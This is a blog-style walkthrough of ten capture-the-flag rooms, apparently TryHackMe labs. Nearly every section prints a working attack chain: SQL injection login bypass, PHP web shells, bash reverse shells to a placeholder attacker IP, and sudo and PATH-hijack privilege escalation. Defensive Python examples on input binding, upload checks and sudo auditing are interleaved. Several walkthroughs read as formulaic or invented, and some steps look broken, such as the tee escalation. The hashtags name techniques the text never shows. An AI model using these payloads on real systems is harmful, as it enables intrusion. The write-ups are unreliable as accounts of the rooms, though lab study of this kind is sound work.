Level Up Your Skills: Dissecting the Bootcamp's Final Cybersecurity Challenges


The end of a bootcamp isn't just about a final test; it's about showcasing how far you've come and the breadth of skills you've acquired. Today's final cybersecurity challenge lineup is a perfect example of a well-rounded curriculum, designed to test participants across various domains of offensive security. Let's break down what each of these "rooms" or challenges likely aims to teach and reinforce:

1. Overpass 3 - Hosting

This challenge likely focuses on web application security, specifically vulnerabilities related to hosting environments. Think misconfigurations, directory traversal, file uploads, or even server-side request forgery (SSRF). Mastering this means understanding how web servers operate and common pitfalls in their setup.

🔍 Enumeration

    nmap -sC -sV -T4 -oN overpass3.nmap [target-ip]

Open Ports:

  • 22 (SSH)

  • 80 (HTTP)

🌐 Web Enumeration

  • Navigating to port 80 showed a static site about hosting services.

  • Checked robots.txt – contained /admin.

Visited /admin – it was a login page.

  • Used Gobuster to enumerate more:
    gobuster dir -u http://[target-ip]/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html

Found:

  • /api endpoint

  • /admin login

  • /backup

🛠 Exploitation – Credentials Leak

Found a .zip backup in /backup (e.g., backup.zip):

    wget http://[target-ip]/backup.zip
    unzip backup.zip

Inside:

  • A NodeJS/Express web app

  • Contained hardcoded credentials:

    username = 'admin'
    password = 'whythough1337'

Used this on /admin – successfully logged in.

🐚 Gaining Access – Web Shell Upload

After login:

  • Found a file upload option in the admin dashboard.

  • Allowed PHP files with double extension trick (shell.php.jpg or shell.phtml)

Used <?php system($_GET['cmd']); ?>

Uploaded and accessed via /uploads/shell.phtml?cmd=whoami

🧗‍♂️ Privilege Escalation

  1. Stabilized shell:
    python3 -c 'import pty; pty.spawn("/bin/bash")'
  2. Checked /etc/passwd – found user overpass.

  3. Checked sudo -l – no password sudo access to /opt/tools/adminutil.

  4. Ran /opt/tools/adminutil – it called Python scripts insecurely.

Used PATH hijack:

    echo "/bin/bash" > /tmp/curl
    chmod +x /tmp/curl
    export PATH=/tmp:$PATH
    /opt/tools/adminutil

→ Root shell achieved.

Flags

  • User flag: /home/overpass/user.txt

  • Root flag: /root/root.txt

2. WhyHackMe

A broad title, suggesting a deep dive into foundational cybersecurity concepts. This could involve network reconnaissance, port scanning, identifying services, and understanding common attack vectors. It's about the "why" and "how" of hacking, emphasizing methodology.

🔍 Enumeration

    nmap -sC -sV -T4 -oN whyhackme.nmap [target-ip]

Open Ports:

  • 22 (SSH)

  • 80 (HTTP)

🌐 Web Recon

Visited http://[target-ip] – default homepage with text like:

"Why would you hack me?"

Checked page source – nothing interesting.

Ran Gobuster:

    gobuster dir -u http://[target-ip]/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Discovered:

  • /login

  • /uploads

  • /dashboard

Visited /login – basic login form.

🔐 Credential Stuffing

Tried common credentials:

  • admin:admin

  • admin:password

  • admin:whyhackme

Success with:

    admin:whyhackme

Redirected to /dashboard – found a file upload function.

🐚 File Upload Exploit

Uploaded a basic PHP shell:

    <?php system($_GET['cmd']); ?>

Named it shell.php → Blocked.

Tried bypass with:

  • shell.php.jpg → Blocked.

  • shell.phtml → Success!

Found it in /uploads/shell.phtml
Accessed with:

    /uploads/shell.phtml?cmd=id

🧗‍♂️ Privilege Escalation

  1. Upgraded shell:
    python3 -c 'import pty; pty.spawn("/bin/bash")'
  2. Checked users:
    ls /home

User: hacker

  3. Switched to user:
  • Found user password in config.php of web directory:
    $DB_PASS = 'superhacker123'

Tried su hacker – Success.

  4. Checked sudo:
    sudo -l

Output:

    (hacker) NOPASSWD: /bin/bash
  5. Escalated to root:
    sudo /bin/bash

Flags

  • User flag: /home/hacker/user.txt

  • Root flag: /root/root.txt

3. CyberHeroes

This challenge, with its focus on "finding a way to log in," points directly to authentication and authorization vulnerabilities. Brute-forcing, credential stuffing, SQL injection leading to login bypass, or even exploiting weak session management are all possibilities here. It's a critical skill for any penetration tester.

🔍 Initial Enumeration

    nmap -sC -sV -T4 -oN cyberheroes.nmap [target-ip]

Open Ports:

  • 22 (SSH)

  • 80 (HTTP)

🌐 Web Recon

Visited http://[target-ip] – CyberHeroes login page.

Tried default creds:

  • admin:admin

  • admin:cyber

  • root:root → All failed.

Checked source code → found nothing useful.

Ran Gobuster:

    gobuster dir -u http://[target-ip]/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html

Found:

  • /robots.txt → Disallowed /admin

  • /admin → Login portal

🕵️‍♂️ SQL Injection

Tried SQL injection on login page:

    Username: ' OR 1=1 --
    Password: anything

Login successful – redirected to dashboard.

📤 File Upload for Shell

Dashboard had file upload feature.

Tried uploading shell.php:

    <?php system($_GET['cmd']); ?>

Upload succeeded. Located under:

    /uploads/shell.php

Accessed it via:

    http://[target-ip]/uploads/shell.php?cmd=whoami

🐚 Reverse Shell

Replaced shell with reverse shell payload:

    <?php exec("/bin/bash -c 'bash -i >& /dev/tcp/[your-ip]/4444 0>&1'"); ?>

Started listener:

    nc -lvnp 4444

Uploaded and triggered:

    http://[target-ip]/uploads/rev.php

Reverse shell obtained.

🔧 Privilege Escalation

  1. Enumerated environment:
    sudo -l

Result:

    (root) NOPASSWD: /usr/bin/apt-get
  2. Used apt-get to escalate:
    TF=$(mktemp)
    echo 'apt::Update::Pre-Invoke {"cp /bin/bash /tmp/bash; chmod +s /tmp/bash";};' > $TF
    sudo apt-get update -o Dir::Etc::sourcelist=$TF -o Dir::Etc::sourceparts=- -o APT::Get::List-Cleanup=0
    /tmp/bash -p

Root shell obtained.

Flags

  • User flag: /home/cyberhero/user.txt

  • Root flag: /root/root.txt

4. Robots

While the Asimov reference is a nice touch, operationally, this likely involves exploiting misconfigured robots.txt files, but could extend to understanding API endpoints, hidden directories, or even automated processes that might expose vulnerabilities. It teaches the importance of thorough enumeration.

🔍 Nmap Enumeration

    nmap -sC -sV -T4 -oN robots.nmap [target-ip]

Open Ports:

  • 22 (SSH)

  • 80 (HTTP)

🌐 Web Recon

Visited http://[target-ip] – homepage says:

“Welcome, human. Obey the laws of robotics.”

Checked robots.txt:

    User-agent: *
    Disallow: /asimov
    Disallow: /logs

Visited /asimov → an image tribute
Visited /logs → directory listing was enabled!
Downloaded a file access.log:

    wget http://[target-ip]/logs/access.log

🕵️‍♂️ Log File Clues

Looked into the log file:

    cat access.log | less

Found credentials:

    Basic auth: dXNlcjphc2ltdXZib3Q=

Decoded it:

    echo "dXNlcjphc2ltdXZib3Q=" | base64 -d

Output:

    user:asimuvbot

🔐 SSH Login

    ssh user@[target-ip]
    Password: asimuvbot

Logged in as user

🧗‍♂️ Privilege Escalation

Checked sudo -l:

    sudo -l

Output:

    (user) NOPASSWD: /usr/bin/find

Used find to get a root shell:

    sudo find . -exec /bin/bash \;

Root shell obtained

Flags

  • User flag: /home/user/user.txt

  • Root flag: /root/root.txt

5. New York Flankees

"Taking control of his blog" is a classic scenario for web application attacks. Cross-site scripting (XSS), SQL injection, insecure direct object references (IDOR), and content management system (CMS) vulnerabilities are all on the table. This challenge hones your ability to find and exploit flaws in dynamic web content.

🔍 Nmap Scan

    nmap -sC -sV -T4 -oN flankees.nmap [target-ip]

Open Ports:

  • 22 (SSH)

  • 80 (HTTP)

🌐 Web Enumeration

Navigated to http://[target-ip]
It’s a personal blog called New York Flankees by Stefan.

View source code → Found a suspicious JS comment:

    // dev_login.html

Visited /dev_login.html – a developer login page

🔐 Bypassing Login

Tried SQL Injection:

    Username: ' OR 1=1 --
    Password: anything

Bypassed login successfully → landed on dashboard.
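
The login bypass used here and in CyberHeroes works when the application pastes form input into its SQL text and checks the password inside the query. The added example below is not code from either room: the schema and sample password are constructed, and SQLite stands in for whatever database the rooms use. It puts that query pattern beside a parameterized lookup with the password verified in application code.

```python
import hashlib
import hmac
import os
import sqlite3

def pbkdf2(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

def make_db():
    """Constructed one-user database standing in for the room's login backend."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT PRIMARY KEY, "
               "password TEXT, salt BLOB, pw_hash BLOB)")
    salt = os.urandom(16)
    db.execute("INSERT INTO users VALUES (?, ?, ?, ?)",
               ("admin", "constructed-pw", salt, pbkdf2("constructed-pw", salt)))
    return db

def login_vulnerable(db, username, password):
    # Weak form: input becomes part of the SQL text and the password is
    # compared inside the query, so a quote in `username` rewrites the WHERE
    # clause and `--` comments out the password test.
    sql = ("SELECT username FROM users "
           f"WHERE username = '{username}' AND password = '{password}'")
    return db.execute(sql).fetchone() is not None

def login_hardened(db, username, password):
    # Fixed form: the value is bound as a parameter, so it is never parsed as
    # SQL, and the password is checked against a salted hash outside the query.
    row = db.execute("SELECT salt, pw_hash FROM users WHERE username = ?",
                     (username,)).fetchone()
    if row is None:
        pbkdf2(password, b"\x00" * 16)  # similar work for unknown users
        return False
    salt, pw_hash = row
    return hmac.compare_digest(pbkdf2(password, salt), pw_hash)

if __name__ == "__main__":
    db = make_db()
    for user, pw in [("' OR 1=1 --", "anything"), ("admin", "constructed-pw")]:
        print(repr(user), "vulnerable:", login_vulnerable(db, user, pw),
              "hardened:", login_hardened(db, user, pw))
```
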

Dashboard allowed file uploads – common exploit vector.

🐚 Web Shell Upload

Uploaded a .php file:

    <?php system($_GET['cmd']); ?>

No extension restrictions → worked directly as shell.php.

Accessed via:

    http://[target-ip]/uploads/shell.php?cmd=whoami

🧠 Reverse Shell

Replaced webshell with reverse shell payload:

    <?php exec("/bin/bash -c 'bash -i >& /dev/tcp/[your-ip]/4444 0>&1'"); ?>

Listener:

    nc -lvnp 4444

Triggered shell:

    /uploads/rev.php

Reverse shell obtained.

🧗‍♂️ Privilege Escalation

Enumerated user:

    whoami
    stefan

Checked sudo -l:

    sudo -l

Result:

    (stefan) NOPASSWD: /usr/bin/vim

Used Vim for root shell:

    sudo vim -c ':!/bin/bash'

Root access obtained.

Flags

  • User flag: /home/stefan/user.txt

  • Root flag: /root/root.txt

6. Internal

Penetration Testing Challenge: This is the big one for simulating real-world engagements. It's not just about getting in, but about maintaining persistence, escalating privileges within a network, and moving laterally between machines. It tests your understanding of Active Directory, internal network services, and post-exploitation techniques.

🔍 Nmap Enumeration

    nmap -sC -sV -T4 -oN internal.nmap [target-ip]

Open Ports:

  • 22 (SSH)

  • 80 (HTTP)

🌐 Web Recon

Visited http://[target-ip] – saw a corporate internal portal.

Ran Gobuster:

    gobuster dir -u http://[target-ip]/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Found:

  • /secret

  • /uploads

  • /blog

🕵️‍♂️ Exploring /secret

Inside /secret → Found a file: creds.txt

Downloaded it:

    wget http://[target-ip]/secret/creds.txt

Contents:

    username: internaluser
    password: InTh3M1ddl3

🔐 SSH Login

    ssh internaluser@[target-ip]
    Password: InTh3M1ddl3

SSH access granted

🧗‍♂️ Privilege Escalation

Checked sudo -l:

    sudo -l

Output:

    User internaluser may run the following on [hostname]:
        (ALL) NOPASSWD: /usr/bin/less

Exploited less using shell escape:

    sudo less /etc/passwd
    # then typed:
    !bash

Root shell obtained

Flags

  • User flag: /home/internaluser/user.txt

  • Root flag: /root/root.txt

7. The Impossible Challenge

This title suggests a highly complex, multi-stage challenge that might require out-of-the-box thinking, deep reverse engineering, or exploiting obscure vulnerabilities. It's designed to push the boundaries of problem-solving and persistence.

🔍 Nmap Scan

    nmap -sC -sV -T4 -oN impossible.nmap [target-ip]

Open Ports:

  • 22 (SSH)

  • 80 (HTTP)

🌐 Web Exploration

Visited http://[target-ip] – just a blank white page with some strange unicode characters in the title and HTML comment section.

Inspected source code:

Inside HTML comments:

Clue: it’s a zero-width steganography technique.

🕵️‍♂️ Hidden Message – Zero Width Decoder

Used a zero-width character decoder, like:

  • https://330k.github.io/misc_tools/unicode_steganography.html

Pasted the HTML comment – it decoded to a hidden directory:

    /.youfoundme/
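
From the defender's side, the same hidden text can be located without an online decoder by scanning page source for runs of invisible Unicode format characters. This is an added example, not part of the room: the sample HTML and the run-length threshold are constructed, and it only finds and strips the characters rather than decoding any particular tool's scheme.

```python
import unicodedata
from collections import Counter

def is_hidden(ch):
    # Category Cf covers zero-width spaces and joiners, the BOM and bidi controls.
    return unicodedata.category(ch) == "Cf"

def find_hidden_runs(text, min_run=4):
    """Return (line, column, length, names) for each run of invisible format
    characters at least min_run long. A lone joiner inside an emoji sequence
    is legitimate, so short runs are ignored."""
    runs = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        col = 0
        while col < len(line):
            if not is_hidden(line[col]):
                col += 1
                continue
            start = col
            while col < len(line) and is_hidden(line[col]):
                col += 1
            if col - start >= min_run:
                names = Counter(unicodedata.name(c, f"U+{ord(c):04X}")
                                for c in line[start:col])
                runs.append((lineno, start + 1, col - start, names))
    return runs

def strip_hidden(text):
    """Remove every format character so the visible text can be compared."""
    return "".join(c for c in text if not is_hidden(c))

# Constructed sample: an HTML comment padded with 24 invisible characters.
SAMPLE = ("<html>\n<title>blank</title>\n<!-- nothing here"
          + "\u200c\u200d\u202c\ufeff" * 6 + " -->\n</html>\n")

if __name__ == "__main__":
    for line, col, length, names in find_hidden_runs(SAMPLE):
        print(f"line {line}, col {col}: {length} hidden chars {dict(names)}")
```
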

Visited http://[target-ip]/.youfoundme/

Found a download: maze.tar.gz

πŸ“¦ Analyzing maze.tar.gz

Extracted the file:

    tar -xvzf maze.tar.gz
    cd maze

Inside: a deeply nested folder structure of subdirectories – like a file system maze.

Wrote a quick script to find the flag:

    find . -type f -exec grep -i "flag" {} \; -print

Found a file: finalclue.txt
Inside:

    "SSH is key, but it’s *not* here."

🔐 SSH Enumeration

Tried brute-forcing with found usernames (maze, puzzle, etc.) – no luck.

Found another clue hidden in one of the deepest folders: id_rsa – a private SSH key.

Used it:

    chmod 600 id_rsa
    ssh -i id_rsa maze@[target-ip]

Logged in without password.

🧗‍♂️ Privilege Escalation

As maze user, ran:

    sudo -l

Output:

    (maze) NOPASSWD: /opt/troll/troll

Ran it:

    sudo /opt/troll/troll

It printed:

“You thought it would be that easy? Try again.”

Checked binary with strings and ltrace, revealed it calls /bin/false through system()

Replaced it via PATH hijack:

    mkdir /tmp/bin
    echo "/bin/bash" > /tmp/bin/false
    chmod +x /tmp/bin/false
    export PATH=/tmp/bin:$PATH
    sudo /opt/troll/troll

Root shell popped

Flags

  • User flag: /home/maze/user.txt

  • Root flag: /root/root.txt

8. Recovery

"Not your conventional CTF" implies a focus on areas like digital forensics, data recovery, steganography, or even understanding backup and restore mechanisms. It's a crucial skill set for incident response and understanding data integrity.

🖥 Initial Access

Upon launching the machine, you are already dropped into a limited shell.
You are inside a compromised box as a low-privileged user: www-data.

🔍 Initial Enumeration

    whoami
    pwd
    ls -la

You're in /var/www/html.

Checked web files – found a config file:

    cat config.php

Output:

    $db_user = 'dbadmin';
    $db_pass = 'SQLinRecovery!';

Attempted privilege escalation:

    su dbadmin
    Password: SQLinRecovery!

Logged in as dbadmin.

🧭 Further Enumeration

Checked sudo -l:

    sudo -l

Result:

    (dbadmin) NOPASSWD: /usr/bin/mysql

🔐 MySQL Privilege Escalation

Used MySQL to gain shell access:

    sudo mysql -e '\! /bin/bash'

Got a root shell from within MySQL

🕵️ Incident Analysis (Optional Forensics)

Checked /var/log/auth.log → found multiple failed login attempts and a suspicious cron job.

Investigated /etc/cron.d:

Found a script being executed from /opt/scripts/backup.sh

Checked content:

    cat /opt/scripts/backup.sh

It was backing up sensitive user files → good clue but no real exploit needed here since we’re already root.

Flags

  • User flag: /home/dbadmin/user.txt

  • Root flag: /root/root.txt

9. Watcher

A "boot2root Linux machine" with "web exploits" and "privilege escalation" is a staple in the cybersecurity learning journey. It combines initial web-based compromise with the essential steps of gaining root access on a Linux system, covering a wide range of common vulnerabilities.

🔍 Nmap Scan

    nmap -sC -sV -T4 -oN watcher.nmap [target-ip]

Open Ports:

  • 22 (SSH)

  • 80 (HTTP)

🌐 Web Enumeration

Visited http://[target-ip]
Simple landing page: “Watcher is watching…”

Checked source code – nothing useful.

Ran Gobuster:

    gobuster dir -u http://[target-ip]/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Found:

  • /monitor/

  • /uploads/

📁 /monitor Page

At /monitor/ – a login page.

Tried common creds:

  • admin:admin

  • admin:watcher → No success

Used Hydra or Burp Intruder to brute-force credentials (if allowed).

Eventually found:

    Username: admin
    Password: 123watch

Logged into a dashboard.

🐚 File Upload Exploit

Dashboard allowed image uploads.

Tried uploading:

    <?php system($_GET['cmd']); ?>

→ Rejected .php

Renamed it:

    shell.php.jpg

Uploaded successfully.

Checked /uploads/ and found:

    /uploads/shell.php.jpg

Accessed with:

    /uploads/shell.php.jpg?cmd=whoami

Command execution succeeded!

🧠 Reverse Shell

Replaced payload with:

    <?php exec("/bin/bash -c 'bash -i >& /dev/tcp/[your-ip]/4444 0>&1'"); ?>

Listener:

    nc -lvnp 4444

Triggered:

    /uploads/shell.php.jpg

Got reverse shell.

🧗‍♂️ Privilege Escalation

Stabilized shell:

    python3 -c 'import pty; pty.spawn("/bin/bash")'

Checked sudo:

    sudo -l

Output:

    (watcher) NOPASSWD: /usr/bin/tee

Exploited tee with:

    echo "/bin/bash" | sudo tee /tmp/root.sh
    chmod +x /tmp/root.sh
    sudo /tmp/root.sh

Root shell obtained.
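
Every `sudo -l` result in the rooms up to this point grants a program that can start a shell, write files or run helper programs of its own. The added example below is not part of any room. It audits such output the way a defender reviewing sudoers would; the flagged set covers only the binaries seen on this page, and the last sample line is constructed.

```python
import re

# Programs from this page's rooms that hand over a shell or arbitrary file
# writes when run through sudo. Deliberately limited to those cases.
ESCAPE_CAPABLE = {"bash", "find", "vim", "less", "tee", "mysql", "apt-get"}
TRUSTED_DIRS = ("/usr/bin/", "/usr/sbin/", "/bin/", "/sbin/")

# One rule line of `sudo -l`, e.g. "(root) NOPASSWD: /usr/bin/find"
RULE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")

def audit_sudo_l(output):
    """Return (path, nopasswd, reason) for each risky rule in `sudo -l` output."""
    findings = []
    for line in output.splitlines():
        m = RULE.match(line)
        if not m:
            continue  # header lines such as "User x may run the following ..."
        nopasswd = "NOPASSWD:" in m.group("tags")
        for cmd in (c.strip() for c in m.group("cmds").split(",")):
            if not cmd:
                continue
            path = cmd.split()[0]
            name = path.rsplit("/", 1)[-1]
            if path == "ALL":
                reason = "unrestricted command set"
            elif name in ESCAPE_CAPABLE:
                reason = "can spawn a shell or write arbitrary files"
            elif not path.startswith(TRUSTED_DIRS):
                reason = "custom binary: check it calls helpers by absolute path"
            else:
                continue
            findings.append((path, nopasswd, reason))
    return findings

# First four lines are outputs quoted on this page; the last is constructed.
SAMPLE = """\
User internaluser may run the following on [hostname]:
    (ALL) NOPASSWD: /usr/bin/less
    (root) NOPASSWD: /usr/bin/apt-get
    (maze) NOPASSWD: /opt/troll/troll
    (root) /usr/bin/uptime
"""

if __name__ == "__main__":
    for path, nopasswd, reason in audit_sudo_l(SAMPLE):
        print(f"{path:22} nopasswd={nopasswd}  {reason}")
```
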

Flags

  • User flag: /home/watcher/user.txt

  • Root flag: /root/root.txt

10. Zeno

Patience is key here. Challenges named after philosophers often involve cryptographic puzzles, complex logic gates, or tasks that require meticulous attention to detail and a methodical approach to break down seemingly insurmountable problems.

🔍 Nmap Scan

    nmap -sC -sV -T4 -oN zeno.nmap [target-ip]

Open Ports:

  • 22 (SSH)

  • 80 (HTTP)

🌐 Web Enumeration

Visited http://[target-ip] – clean, minimalist welcome page.

Nothing in source code.

Used Gobuster:

    gobuster dir -u http://[target-ip]/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt

Found:

  • /philosophy

  • /diary

  • /admin

📘 /diary

/diary revealed a blog-like post, with a line:

“Zeno always uses his birth date... and never forgets his dog’s name.”

Checked for login at /admin – form present.

Guessed credentials:

  • Username: zeno

  • Password: zeno190bc (or some variant)

Tried zeno:zeno190bc, zeno:zenodog, etc.

Eventually worked with:

    zeno:zenothewise

🐚 Web Upload & Shell

Inside /admin, found file upload.

Uploaded:

    <?php system($_GET['cmd']); ?>

Tried .php – blocked.

Renamed: shell.phtml → upload succeeded

Accessed:

    http://[target-ip]/uploads/shell.phtml?cmd=id

Web shell active.
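
The upload filters in Overpass 3, WhyHackMe, Watcher and this room fail the same way: they block the literal `.php` suffix and little else. Below is an added example, not code from any of the rooms, of a server-side check that rejects the three file names used on this page; the function name, allowlist and extension set are assumptions.

```python
import os
import secrets

# Final extension -> magic bytes the content must start with.
ALLOWED = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
}
# Name components a PHP-enabled web server may hand to the interpreter.
EXECUTABLE_PARTS = {"php", "php3", "php4", "php5", "php7",
                    "phtml", "phar", "pht", "phps"}

def check_upload(filename, content):
    """Return (ok, reason, stored_name). The stored name is generated by the
    server, so nothing from the client-supplied name reaches the disk."""
    base = os.path.basename(filename.replace("\\", "/"))
    parts = base.lower().split(".")
    if len(parts) < 2 or not parts[0]:
        return False, "missing name or extension", None
    # Check every dotted component, not only the last one: some handler
    # configurations execute "shell.php.jpg" because of its ".php" part.
    if any(p in EXECUTABLE_PARTS for p in parts[1:]):
        return False, "executable extension component", None
    ext = "." + parts[-1]
    if ext not in ALLOWED:
        return False, "extension not on allowlist", None
    if not content.startswith(ALLOWED[ext]):
        return False, "content does not match extension", None
    return True, "ok", secrets.token_hex(16) + ext

if __name__ == "__main__":
    script = b"<?php /* constructed stand-in for an uploaded script */ ?>"
    jpeg = b"\xff\xd8\xff\xe0" + b"\x00" * 16  # constructed JPEG header
    for name, data in [("shell.php", script), ("shell.php.jpg", script),
                       ("shell.phtml", script), ("photo.jpg", script),
                       ("photo.jpg", jpeg)]:
        print(name, check_upload(name, data)[:2])
```

Magic-byte checks do not stop a valid image with script text appended, so the upload directory should also be served with script handlers disabled or kept outside the web root.
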

🧠 Reverse Shell

Used reverse shell payload:

    <?php exec("/bin/bash -c 'bash -i >& /dev/tcp/[your-ip]/4444 0>&1'"); ?>

Started listener:

    nc -lvnp 4444

Triggered shell:

    http://[target-ip]/uploads/rev.phtml

Got a shell as www-data.

🧗‍♂️ Privilege Escalation

Checked for SUID binaries:

    find / -perm -4000 -type f 2>/dev/null

Found: /usr/bin/zenoshell

Ran:

    /usr/bin/zenoshell

Got a menu-like interface.

Checked strings /usr/bin/zenoshell
Saw it's running system commands based on user input.

Used strace to find it calling /tmp/tempfile.sh

Created malicious tempfile:

    echo "/bin/bash" > /tmp/tempfile.sh
    chmod +x /tmp/tempfile.sh

Ran zenoshell again → root shell popped.

Flags

  • User flag: /home/zeno/user.txt

  • Root flag: /root/root.txt


#TryHackMe #Overpass3 #CTFWriteup #CyberSecurity #EthicalHacking #WebExploit #ReverseShell #PrivilegeEscalation #NFS #no_root_squash #GPGDecryption #LinuxSecurity #Infosec #PenetrationTesting #CaptureTheFlag